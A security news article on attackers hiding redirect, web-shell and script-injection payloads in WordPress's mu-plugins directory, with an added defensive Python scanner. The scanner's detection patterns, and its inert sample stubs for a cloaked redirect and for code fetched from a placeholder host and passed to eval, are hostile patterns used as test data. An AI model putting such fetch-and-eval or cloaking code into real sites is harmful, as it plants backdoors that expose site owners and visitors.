Hackers abuse MU plugins to inject malicious payloads to WordPress

📟 News

Date: 01/04/2025

According to Sucuri, hackers store malicious code in the MU-plugins (Must-Use Plugins) directory in WordPress and execute it while remaining undetected.

The technique was first discovered in February 2025, but its use has kept growing since then, and attackers currently abuse MU plugins to run three different types of malicious code.

Must-Use Plugins are a special type of WordPress plugin that runs on every page load and does not require activation in the Admin Panel. These PHP files are stored in the wp-content/mu-plugins/ directory, are executed automatically, and do not appear on the Plugins page of the Admin Panel unless the Must-Use filter is selected.

Among other things, such plugins are used to enforce custom security rules across the website, boost performance, dynamically modify variables, etc.

Since MU plugins are executed on every page load and don’t appear in the standard plugin list, they can be used to covertly perform a wide range of malicious operations (e.g. steal credentials, inject malicious code, or modify HTML output).

Sucuri experts discovered three different payloads placed by cybercriminals to the MU-plugins directory:

  • redirect.php redirects visitors (excluding bots and logged-in admins) to the malicious website updatesnow[.]net, which displays a fake browser update prompt to trick the victim into downloading malware;
  • index.php is a web shell that acts as a backdoor by downloading and executing PHP code from a GitHub repository; and
  • custom-js-loader.php loads JavaScript that replaces all images on the website with explicit content, hijacks all external links, and opens fraudulent pop-ups.
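The three payloads above share traits that the description of MU plugins makes easy to check for: they live in wp-content/mu-plugins/, and each either fetches and evaluates remote code, redirects selectively (skipping bots and logged-in users), or injects an external script. The following triage script is an added example, not Sucuri's tooling or WordPress code; the indicator names are our own labels, and the sample directory it scans is constructed inline with placeholder hosts (nothing is fetched or executed).

```python
import re
import tempfile
from pathlib import Path

# Indicator names are our own labels for the behaviours described in the article.
INDICATORS = {
    "remote_code_fetch": re.compile(r"(file_get_contents|curl_init|fopen)\s*\(\s*['\"]https?://", re.I),
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function|base64_decode)\s*\(", re.I),
    "conditional_redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "bot_or_admin_check": re.compile(r"HTTP_USER_AGENT|is_user_logged_in|current_user_can", re.I),
    "external_script": re.compile(r"wp_enqueue_script\s*\([^)]*https?://|<script[^>]*src\s*=\s*['\"]https?://", re.I),
}
# Combinations that match the payload patterns above and warrant immediate attention.
HIGH_COMBOS = [{"remote_code_fetch", "dynamic_eval"}, {"conditional_redirect", "bot_or_admin_check"}]

def scan_file(path):
    """Return the sorted list of indicator names present in one PHP file."""
    text = Path(path).read_text(errors="ignore")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def triage_mu_plugins(mu_dir):
    """Map each flagged .php file under the MU-plugins directory to (severity, indicators)."""
    report = {}
    for p in sorted(Path(mu_dir).rglob("*.php")):
        hits = scan_file(p)
        if not hits:
            continue
        sev = "high" if any(combo <= set(hits) for combo in HIGH_COMBOS) else "review"
        report[str(p.relative_to(mu_dir))] = (sev, hits)
    return report

def build_sample_dir():
    """Constructed stand-in for wp-content/mu-plugins/: one benign file plus two stubs
    that mimic the redirect and web-shell behaviours (placeholder hosts, inert)."""
    d = Path(tempfile.mkdtemp())
    (d / "site-tweaks.php").write_text(
        "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n")
    (d / "redirect.php").write_text(
        "<?php\nif (is_user_logged_in() || stripos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false) return;\n"
        "header('Location: https://updates.example.invalid/');\nexit;\n")
    (d / "index.php").write_text(
        "<?php\n$c = file_get_contents('https://raw.example.invalid/p.txt');\neval($c);\n")
    return d

if __name__ == "__main__":
    for name, (sev, hits) in triage_mu_plugins(build_sample_dir()).items():
        print(f"{sev:6} {name}: {', '.join(hits)}")
```

Point `triage_mu_plugins()` at a real wp-content/mu-plugins/ directory to list every file worth a manual look; a flagged file is a lead for review, not proof of compromise.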

The most dangerous payload is the web shell, since it enables attackers to remotely execute commands on the server, steal data, and launch further attacks on the site's users and visitors.

The other two malware samples are more likely to damage the website's reputation and its SEO rankings through suspicious redirects and attempts to install malware on visitors' computers.

The infection vector used by the attackers is still unknown. It is assumed that they exploit known vulnerabilities in WordPress plugins and themes, or weak admin credentials.
